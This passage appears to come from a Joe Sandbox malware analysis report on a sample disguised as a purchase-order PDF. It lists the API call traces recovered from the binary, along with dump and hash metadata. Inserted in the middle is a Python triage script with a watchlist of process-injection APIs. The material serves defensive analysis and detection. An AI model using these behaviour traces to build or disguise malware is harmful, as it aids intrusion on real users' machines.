• __getptd.LIBCMT ref: 00415750
• CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
• __dosmaperr.LIBCMT ref: 004157A9
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1269668773-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                            • String ID:
• API String ID: 4166825349-0
• Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
• Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
• Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
• Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
• API String ID: 2574300362-3261711971
• Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
• Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
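The record above shows the sample resolving RegDeleteKeyExW from advapi32.dll at runtime through LoadLibraryA and GetProcAddress instead of importing it statically. The following Python is an added example, not part of the Joe Sandbox report: it parses "APIs" records in this report's line format, pairs each GetProcAddress with the preceding LoadLibrary* call in the same record, and flags resolved names that appear on a watchlist. The sample input is constructed from the two records on this page (this one and the GetClientRect/GetWindowRect record that follows), and the watchlist is the editor's own choice, not anything the report asserts.

```python
"""Parse Joe Sandbox 'APIs' function records and flag runtime API resolution."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: two function records copied in the report's own line
# format (the LoadLibraryA/GetProcAddress record and the GetClientRect record).
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
• Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
APIs
• GetClientRect.USER32(?,?), ref: 00433724
• GetWindowRect.USER32(00000000,?), ref: 00433757
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
"""

# One API line in the report: "• Func.MODULE(arg1,arg2,...), ref: ADDRESS"
_API_LINE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]{8})$")
_FUZZY_LINE = re.compile(r"^• Instruction Fuzzy Hash: ([0-9A-Fa-f]+)$")
# Arguments the sandbox could not recover as a string: "?" or a raw 8-digit hex value
_PLACEHOLDER = re.compile(r"^(\?|[0-9A-Fa-f]{8})$")

# Watchlist (editor's assumption, not taken from the report): exports whose
# runtime resolution deserves a second look in a sample with this report's verdicts.
DEFAULT_WATCHLIST = frozenset({
    "RegDeleteKeyExW", "WriteProcessMemory", "CreateRemoteThread",
    "NtUnmapViewOfSection", "SetWindowsHookExW", "VirtualAllocEx",
})


def parse_records(text: str) -> List[Dict]:
    """Split report text into per-function records, one per 'APIs' header."""
    records: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "fuzzy": None}
            records.append(current)
            continue
        if current is None:
            continue  # text before the first record (e.g. a previous record's tail)
        m = _API_LINE.match(line)
        if m:
            func, module, args, ref = m.groups()
            # Arguments are comma separated; these records contain no nested
            # parentheses or quoted commas, so a plain split is adequate here.
            current["apis"].append({"func": func, "module": module,
                                    "args": args.split(",") if args else [],
                                    "ref": ref})
            continue
        m = _FUZZY_LINE.match(line)
        if m:
            current["fuzzy"] = m.group(1)
    return records


def dynamic_imports(record: Dict) -> List[Tuple[str, str, str]]:
    """Pair each GetProcAddress with the most recent LoadLibrary* in the record.

    Returns (call address, library, resolved export name). Calls whose name
    argument is a placeholder are skipped because the name was not recovered.
    """
    found: List[Tuple[str, str, str]] = []
    last_lib = "<unknown>"
    for call in record["apis"]:
        if call["func"].startswith("LoadLibrary") and call["args"]:
            last_lib = call["args"][0]
        elif call["func"] == "GetProcAddress" and len(call["args"]) >= 2:
            name = call["args"][1]
            if not _PLACEHOLDER.match(name):
                found.append((call["ref"], last_lib, name))
    return found


def flag_records(records: List[Dict], watchlist=DEFAULT_WATCHLIST) -> List[Tuple[str, str, str]]:
    """Return (address, library, name) for every watchlisted runtime-resolved export."""
    return [hit for rec in records for hit in dynamic_imports(rec) if hit[2] in watchlist]


if __name__ == "__main__":
    for ref, lib, name in flag_records(parse_records(SAMPLE_REPORT)):
        print(f"{ref}: {lib}!{name} resolved at runtime")
```

One caveat a triage analyst would apply: resolving RegDeleteKeyExW through GetProcAddress is also an ordinary compatibility idiom, because that export is absent on older 32-bit Windows releases, so on its own this record is a weak signal. It carries more weight in combination with the report's other findings (the dropped executables, the Defender exclusion and the process injection listed in the overview) than as an isolated indicator.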
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
• Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
• Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
• Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
APIs
• GetClientRect.USER32(?,?), ref: 00433724
• GetWindowRect.USER32(00000000,?), ref: 00433757
• GetClientRect.USER32(0000001D,?), ref: 004337AC
• GetSystemMetrics.USER32(0000000F), ref: 00433800
• GetWindowRect.USER32(?,?), ref: 00433814
• ScreenToClient.USER32(?,?), ref: 00433842
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
• Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
• Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
• Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
• Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
• Opcode ID: 1bdbad209a9f2f44fe01a9dcdf7f5a882a75906cac9df52365f752c76c4db998
• Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
• Opcode Fuzzy Hash: 1bdbad209a9f2f44fe01a9dcdf7f5a882a75906cac9df52365f752c76c4db998
• Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                                                                                                                                                            • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4072873d08f1a4b96299f6c0206abd7390e9c2612247138ce8cf4b743a462713
                                                                                                                                                                                                                                                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4072873d08f1a4b96299f6c0206abd7390e9c2612247138ce8cf4b743a462713
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4189319755-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
